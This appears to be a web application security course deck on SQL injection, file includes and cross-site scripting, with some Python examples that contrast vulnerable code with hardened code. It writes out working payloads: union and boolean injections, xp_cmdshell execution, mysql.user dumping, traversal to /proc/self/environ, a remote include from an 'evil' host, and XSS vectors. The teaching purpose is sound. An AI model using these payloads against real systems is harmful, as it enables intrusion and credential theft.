Web Application Security 101 - 14 Data Validation

In part 14 of Web Application Security 101 you will learn about SQL Injection, Cross-site Scripting, Local File Includes and other common types of data validation problems.

Published in: Software

  1. Data Validation. Common input validation problems.
  2. Types Of Problems. SQL Injection, Local File Includes, Cross-site Scripting.
  3. SQL Injection. SQL Injection is an attack where a partial or a complete SQL query is inserted (injected) into another query run by the targeted application.
  4. Types Of SQL Injection. Vanilla - when errors are displayed. Blind - when no errors are displayed.
  5. SQL Backends. There are multiple SQL backends with various features. Common backends: MsSQL (Transact-SQL), MySQL, PostgreSQL, Oracle (PL/SQL) and many more.
  6. SQL Injection In Principle. Works by injecting SQL fragments into already existing queries.
         SELECT * FROM table WHERE column = 'injected by the user'
  7. In Detail. Assuming that $value is a variable controlled by the user:
         $query = "SELECT * FROM table WHERE column = '" . $value . "'";
     When $value equals ' OR '1'='1 then:
         SELECT * FROM table WHERE column = '' OR '1'='1'
  8. SQL Injection Techniques. Union Selection - to obtain values from other tables.
         SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'
     Boolean Selection - to create universally true or false statements.
         SELECT * FROM table WHERE column = '' OR '1'='1'
     Time Selection - to detect injection by timing the execution.
         SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false')--'
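Slides 7 and 8 in working code, as an added example that is not part of the original deck: the concatenated query from slide 7 run against a constructed SQLite table (standing in for the slide's "table"/"column"), showing the boolean and union payloads from slide 8 altering the result, next to the parameterized form that leaves them inert. The table, names and function names are assumptions made for the example.

```python
import sqlite3

def make_db():
    # Constructed in-memory table standing in for the slide's "table"/"column".
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")])
    return db

def lookup_concat(db, value):
    # Vulnerable: the slide's concatenation pattern; the value becomes query text.
    query = "SELECT name FROM users WHERE name = '" + value + "'"
    return [row[0] for row in db.execute(query)]

def lookup_param(db, value):
    # Hardened: the value is bound as a parameter and can never alter the query.
    return [row[0] for row in db.execute("SELECT name FROM users WHERE name = ?", (value,))]

BOOLEAN_PAYLOAD = "' OR '1'='1"                      # slide 7/8: universally true WHERE
UNION_PAYLOAD = "' UNION SELECT role FROM users--"   # slide 8: read another column

if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "bob"))                  # ['bob']
    print(lookup_concat(db, BOOLEAN_PAYLOAD))        # ['alice', 'bob', 'carol']
    print(sorted(lookup_concat(db, UNION_PAYLOAD)))  # ['admin', 'user']
    print(lookup_param(db, BOOLEAN_PAYLOAD))         # []
```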
  9. MsSQL Injection Techniques. Table enumeration - find the table structure.
         SELECT * FROM table WHERE column = '' HAVING 1=1--'
         SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--
     Code execution - running arbitrary commands.
         SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'comman
     Query delay - timing delay after the query.
         SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'
  10. MySQL Injection Techniques Pt. 1. Finding information - retrieving various server variables and functions.
         SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',
     User enumeration - retrieving MySQL server users and passwords.
         SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'
  11. MySQL Injection Techniques Pt. 2. Table enumeration - retrieving MySQL server tables.
         SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#
     Column enumeration - retrieving MySQL server columns.
         SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns
  12. SQL Injection Tools. Sqlninja, Sqlmap.
  13. SQL Injection Is Art. There are many different types of tools and techniques, of various levels of complexity, used to exploit SQL Injection vulnerabilities.
  14. File Includes. This attack vector is used to perform arbitrary file/URL reads or execution using low-level functions and application-specific features.
  15. Types Of File Includes. Local File Include - when the included file is local. Remote File Include - when the included file is fetched remotely.
  16. File Include In Principle. Works when user data reaches a function used to fetch a file.
         <?php fetchfile("./path/to/file/injected by the user") ?>
  17. In Detail. Assuming that $value is a variable controlled by the user:
         <?php fetchfile("./path/to/file/" . $value) ?>
     When $value equals ../../../index.php then:
         <?php fetchfile("./path/to/file/../../../index.php") ?>
  18. File Include Techniques Pt. 1. Usage of ../ to traverse the directory structure.
         <?php fetchfile("./path/to/file/../../../index.php") ?>
     Usage of null (0x00) to terminate strings for low-level C functions.
         <?php fetchfile("./path/to/file/../../../index.php\0.txt") ?>
  19. File Include Techniques Pt. 2. Usage of an overlong dot (0xc0, 0xae) to bypass escape functions.
         <?php fetchfile("./path/to/file/\xc0\xae./../../index.php\0.txt") ?>
     Usage of system resources to cause other behaviour.
         <?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
  20. Remote File Includes. This type of problem occurs when a remote file controlled by the attacker is included. In this case the attacker has greater control over the exploitation process, since something special can be done to the file.
         <?php fetchfile("http://evil/path/to/file") ?>
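A hardened replacement for the slide's fetchfile("./path/to/file/" . $value), as an added example that is not part of the original deck: it refuses URL-like values (slide 20), null bytes and overlong-UTF-8 bytes (slides 18 and 19), and any path that resolves outside the include directory (slides 17 to 19). The function names, the temporary directory layout and the file contents are constructed for the example.

```python
import os
import tempfile

class IncludeRejected(ValueError):
    """Raised for any user-supplied path that fails validation."""

def safe_fetch(base_dir, user_path):
    # Hardened stand-in for the slide's fetchfile("./path/to/file/" . $value).
    # 1. Remote File Include (slide 20): anything URL-like is refused.
    if "://" in user_path:
        raise IncludeRejected("remote includes are not allowed")
    # 2. Null-byte truncation (slide 18) and overlong-UTF-8 dots (slide 19):
    #    only printable ASCII is accepted, so neither trick reaches the OS.
    if any(ord(ch) < 32 or ord(ch) > 126 for ch in user_path):
        raise IncludeRejected("control or non-ASCII byte in path")
    # 3. Traversal (slides 17-19): resolve symlinks and ".." first, then require
    #    that the final path still lies inside base_dir.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected("path escapes the include directory")
    with open(target, "rb") as fh:
        return fh.read()

def is_rejected(base_dir, user_path):
    # Convenience wrapper: True when safe_fetch refuses the path.
    try:
        safe_fetch(base_dir, user_path)
    except IncludeRejected:
        return True
    return False

def make_fixture():
    # Constructed layout: <tmp>/includes/page.txt is the only allowed file,
    # <tmp>/secret.txt is what a traversal payload would try to reach.
    root = tempfile.mkdtemp()
    include_dir = os.path.join(root, "includes")
    os.mkdir(include_dir)
    with open(os.path.join(include_dir, "page.txt"), "wb") as fh:
        fh.write(b"included content")
    with open(os.path.join(root, "secret.txt"), "wb") as fh:
        fh.write(b"not reachable through the include")
    return include_dir

if __name__ == "__main__":
    inc = make_fixture()
    print(safe_fetch(inc, "page.txt"))
    for p in ("../secret.txt", "page.txt\0.txt", "\xc0\xae./../secret.txt",
              "../../../../../proc/self/environ", "http://evil/path/to/file"):
        print(repr(p), "rejected:", is_rejected(inc, p))
```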
  21. FI Is Art. File Include attacks are a popular mechanism for compromising web applications.
  22. Cross-site Scripting. A type of vulnerability where an attacker can bypass the SOP (Same Origin Policy) through client-side injection or by abusing certain forms of configuration.
  23. Types Of XSS. Reflected - when the injection is immediately returned. Stored - when the injection is stored. DOM-based - when the injection occurs due to JS. Others - there are many other uncategorized variants.
  24. XSS In Principle. Works by injecting fragments of HTML/JS inside the web page.
         <span>injected by the user</span>
  25. In Detail. Assuming that $value is a variable controlled by the user:
         <span><?php echo $value ?></span>
     When $value equals <script>alert(1)</script> then:
         <span><script>alert(1)</script></span>
  26. XSS Techniques Pt. 1. When script tags are sanitized or escaped:
         <span><img src=a onerror=alert(1)></span>
     When the injection occurs inside an event attribute:
         <button onclick="alert(1)"></button>
  27. XSS Techniques Pt. 2. When the injection occurs inside a JavaScript tag:
         <script>var a = ""; alert(1); "";</script>
     When the injection occurs in multiple small places:
         <span><script>alert(1)/* is something like */</script></span>
  28. Stored XSS. The injection is temporarily or permanently stored.
         <?php $_SESSION['name'] = $_GET['name'] ?>
     Later on there is code that causes the XSS to occur:
         <span><?php echo $_SESSION['name'] ?></span>
  29. DOM-based XSS. The injection may occur at any point but is triggered via JavaScript.
         <script>
         var match = document.location.search.match(/[?&]name=(\w+)/);
         if (match) { document.write("Hello " + match[1]); }
         </script>
     There are many different ways an injection can occur.
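Output encoding for the server-side contexts on slides 25 to 28, as an added example that is not part of the original deck: the raw interpolation from slide 25 beside context-specific escaping for HTML text, for an attribute (slide 26) and for a JavaScript string literal (slide 27). The render function names and the HTML templates are assumptions made for the example; the payloads are the ones the slides use.

```python
import html
import json

def render_unsafe(value):
    # The slide's <span><?php echo $value ?></span>: raw interpolation, no escaping.
    return "<span>" + value + "</span>"

def render_text(value):
    # HTML text context (slides 25/28): escape & < > " ' so no tag can start.
    return "<span>" + html.escape(value, quote=True) + "</span>"

def render_attr(value):
    # Attribute context (slide 26): always quote the attribute and escape quotes,
    # so the value cannot close the attribute and add an on* handler.
    return '<button title="' + html.escape(value, quote=True) + '"></button>'

def render_js_string(value):
    # JavaScript string context (slide 27): emit a JSON string literal, which
    # escapes quotes, backslashes and control characters, and additionally break
    # "</" so the browser never sees an early </script>.
    literal = json.dumps(value).replace("</", "<\\/")
    return "<script>var a = " + literal + ";</script>"

SCRIPT_PAYLOAD = "<script>alert(1)</script>"        # slide 25
ATTR_PAYLOAD = '" onclick="alert(1)'                 # slide 26
JS_PAYLOAD = '"; alert(1); "'                        # slide 27
BREAKOUT_PAYLOAD = "</script><script>alert(1)</script>"

if __name__ == "__main__":
    print(render_unsafe(SCRIPT_PAYLOAD))   # the browser executes this
    print(render_text(SCRIPT_PAYLOAD))     # rendered as literal text
    print(render_attr(ATTR_PAYLOAD))
    print(render_js_string(JS_PAYLOAD))
    print(render_js_string(BREAKOUT_PAYLOAD))
```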
  30. Other Forms Of XSS. The presence of crossdomain.xml may open the app to XSS.
         <?xml version="1.0" encoding="UTF-8" ?>
         <cross-domain-policy>
           <allow-access-from domain="*"/>
         </cross-domain-policy>
  31. XSS Is Art. Cross-site scripting is a very common and widespread vulnerability.
  32. Other Input Validation Flaws. Memory Corruption, Command Injection, LDAP Injection, XML Injection, XPATH Injection, SSI Injection, Remote File Inclusion and many, many more.
  33. Lab. We will be finding data validation problems.